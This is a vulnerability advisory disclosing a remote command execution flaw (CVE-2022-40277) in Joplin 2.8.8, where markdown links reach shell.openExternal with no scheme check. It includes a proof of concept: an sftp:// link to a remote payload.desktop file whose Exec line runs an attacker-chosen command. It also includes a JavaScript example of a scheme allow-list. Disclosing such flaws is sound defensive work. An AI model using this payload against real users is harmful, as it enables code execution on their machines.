Joplin 2.8.8 - Remote Command Execution

Summary

Name: Joplin 2.8.8 - Remote Command Execution
Code name:
Product: Joplin
Affected versions: Version 2.8.8
State: Public
Release date: 2022-09-26

Vulnerability

Kind: Remote command execution
Rule:
Remote: Yes
CVSSv3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
CVSSv3.1 Base Score: 7.7
Exploit available: Yes
CVE ID(s):

Description

Joplin version 2.8.8 allows an external attacker to execute arbitrary commands remotely on any client that opens a link in a malicious markdown file with Joplin. This is possible because the application does not properly validate the scheme/protocol of the links in the markdown file before passing them to the shell.openExternal function.

Vulnerability

This vulnerability occurs due to improper scheme/protocol validation of external URLs. Here is a small example to give you a better understanding of the vulnerability.

[image]

Basically, the application passes any URL present in the markdown file straight to shell.openExternal(url), whatever its scheme.
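The pattern described above beside the check that would close it, as an added example written for this advisory (not Joplin's code): the scheme allow-list, the function names and the stub standing in for Electron's shell.openExternal are all assumptions.

```javascript
// Added example (not Joplin's code): allow-list the URL scheme before a link
// taken from untrusted markdown is handed to the OS via shell.openExternal.

// Schemes a note client has a reason to hand to the OS (assumed allow-list).
// Everything else (sftp, smb, file, javascript, custom handlers, ...) is refused.
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

// True only when `link` parses as an absolute URL with an allowed scheme.
function isSafeExternalUrl(link) {
  let parsed;
  try {
    parsed = new URL(String(link)); // WHATWG parser; throws on relative/garbage input
  } catch (_) {
    return false;
  }
  // URL() lower-cases the scheme, so "SFTP://..." is caught as well.
  return ALLOWED_SCHEMES.has(parsed.protocol);
}

// Vulnerable pattern from the advisory: every link goes straight to the OS.
function openLinkUnchecked(link, openExternal) {
  openExternal(link);
  return true;
}

// Hardened pattern: refuse anything outside the allow-list; caller can log it.
function openLinkChecked(link, openExternal) {
  if (!isSafeExternalUrl(link)) {
    return false;
  }
  openExternal(link);
  return true;
}

// Demo with a stub in place of Electron's shell.openExternal; the link list is
// constructed for this example and includes the advisory's sftp:// link.
function demo() {
  const opened = [];
  const stubOpenExternal = (u) => opened.push(u);
  const links = [
    'https://joplinapp.org/',
    'sftp://user@server/uploads/payload.desktop',
    'file:///tmp/notes.txt',
    'javascript:alert(1)',
  ];
  for (const l of links) openLinkChecked(l, stubOpenExternal);
  return opened; // only the https link reaches the OS
}

console.log(demo());
```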

Exploitation requirements

To achieve the RCE, the attacker will abuse certain schemes/protocols. Some of these only work on Windows, others on macOS, and others only work correctly under certain specific Linux distributions. In my case, I used Xubuntu 20.04 (Xfce) to simulate a victim. I chose this distribution because in its default configuration it executes the payload.desktop file after mounting the remote location where the payload file is located. In other Linux distributions, by default, these files are not executed once the remote location is mounted.

In the resources section I will provide you with support material so that you can understand in greater depth what I have just explained.

Exploitation

To exploit this vulnerability, you must send the following file to a user to open with Joplin:

exploit.md

[exploit](sftp://user@server/uploads/payload.desktop)

payload.desktop

In the Exec parameter you put the command you want the victim to execute.

[Desktop Entry]
Exec=xmessage "RCE by cbelloatfluid"
Type=Application

Evidence of exploitation

[image: RCE-Joplin]

Our security policy

We have reserved the CVE-2022-40277 to refer to this issue from now on.

System Information

  • Version: Joplin 2.8.8

  • Operating System: GNU/Linux - Xubuntu 20.04 (Xfce)

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

References

Vendor page https://github.com/laurent22/joplin

Timeline

2022-09-07: Vulnerability discovered.

2022-09-08: Vendor contacted.

2022-09-26: Public disclosure.
